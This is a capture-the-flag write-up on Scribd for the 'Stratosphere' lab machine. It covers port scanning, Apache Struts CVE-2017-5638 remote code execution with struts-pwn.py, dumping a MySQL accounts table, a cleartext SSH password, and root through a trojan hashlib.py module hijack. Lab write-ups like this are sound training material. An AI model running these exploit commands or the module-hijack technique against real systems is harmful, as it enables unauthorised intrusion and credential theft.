Scribd
Upload
104 views7 pages

Stratosphere Writeup

Nmap scanning revealed ports 22, 80, and 8080 open on the target. Gobuster found a /Monitoring directory. This led to a Apache Struts application vulnerable to CVE-2017-5638. Remote code execution was achieved using struts-pwn.py. Database credentials were found in a db_connect file, allowing access to a MySQL users database. This revealed a richard/9tc*rhKuG5TyXvUJOrE^5CK7k account. SSHing in as richard, a test.py file was found containing an encrypted hash. This was cracked online. Further privilege escalation was achieved by creating a Trojan hashlib.py module to gain root

Uploaded by

shiv
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
104 views7 pages

Stratosphere Writeup

Nmap scanning revealed ports 22, 80, and 8080 open on the target. Gobuster found a /Monitoring directory. This led to a Apache Struts application vulnerable to CVE-2017-5638. Remote code execution was achieved using struts-pwn.py. Database credentials were found in a db_connect file, allowing access to a MySQL users database. This revealed a richard/9tc*rhKuG5TyXvUJOrE^5CK7k account. SSHing in as richard, a test.py file was found containing an encrypted hash. This was cracked online. Further privilege escalation was achieved by creating a Trojan hashlib.py module to gain root

Uploaded by

shiv
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 7

Stratosphere Write up

Enumeration

Do a basic Nmap scan to get the port result.

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)

80/tcp open http

8080/tcp open http-proxy

Enumerating Webservice - Port 80

Visiting the webservices on port 80 in a web browser brings us to the “Stratosphere” Web
Application landing page.

Clicking on the “Getting Started” URL leads us to a “Site under construction” page as seen below.

Now We will do a gobuster to find anynew folder and pages.


gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.64/ -x
php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_strato

We found the above new folders.

Visiting the /Monitorting web content redirects us to to the “Stratosphere Credit Monitoring”
Application.

The application has a unique web file extension of .action which is associated with the Apache Struts
url pattern. After some further research, we can learn that it is indeed a well-known extension for
the Java WebSphere & Apache Struts applications.
At this particular point if you are familiar with popular infosec news/events, you would know that
the U.S Credit Monitoring organization known as “Equifax” was compromised through an unpatched
apache struts vulnerability. Based on the similarities, and context clues of the “Stratosphere Credit
Monitoring” we can maybe assume that this application is vulnerable to the “Apache Struts” RCE
vulnerability.

After some quick googling we come across the following PoC exploit for the Apache Struts, CVE-
2017-5638 vulnerability called struts-pwn.

Install the tool by below command.

git clone https://github.com/mazen160/struts-pwn.git

Once the tool is downloaded, we will open that folder and run the following command.

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "id; uname


-a"

Now that we know we have successful remote code execution, let’s try to escalate our privileges
further, and look into getting an interactive shell.

After exploring we found a file with name db_connect, let’s see what’s in that.

To do that will will use the tool to cat the file.


And we found the username and password for Users and SSN.

It seems as though there is a database running on the server. We can enumerate the mysql database
through the apache struts exploit. Using the mysql -e parameter we can run mysql commands non-
interactively, and receive the output of the queries through stdout.

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql


--user=admin --password=admin -e "show databases;"'

Database

information_schema

users

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql


--user=admin --password=admin -e "use users; show tables;"'

Tables_in_users

Accounts

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql


--user=admin --password=admin -e "use users; select * from users.accounts;"' contents of the
accounts table.

We found the Fullname and password of Richard F Smith.

Attempting to ssh into the box using the richard account, and the password of
9tc*rhKuG5TyXvUJOrE^5CK7k from the mysql database results in.
Privilege Escalation
Upon enumeration We found the file test.py , we tried to open it and found it has some hash
stored in it.

So now we will decrypt the hash online and we got the following.
Successfully solving the challenge results in a Permissioned denied on the the sucess.py script so it
seems that this may have been a false flag, and we need to do further enumeration for the proper
priv. esc vector.

In order to exploit this vulnerability, all we have to do is create a python module (that our target
script is importing) in the directory of the script that we are attempting to run. Since the test.py
script imports the hashlib library we will create a hashlib.py python module, which will load our code
over the original hashlib python module.

Now we got root.

You might also like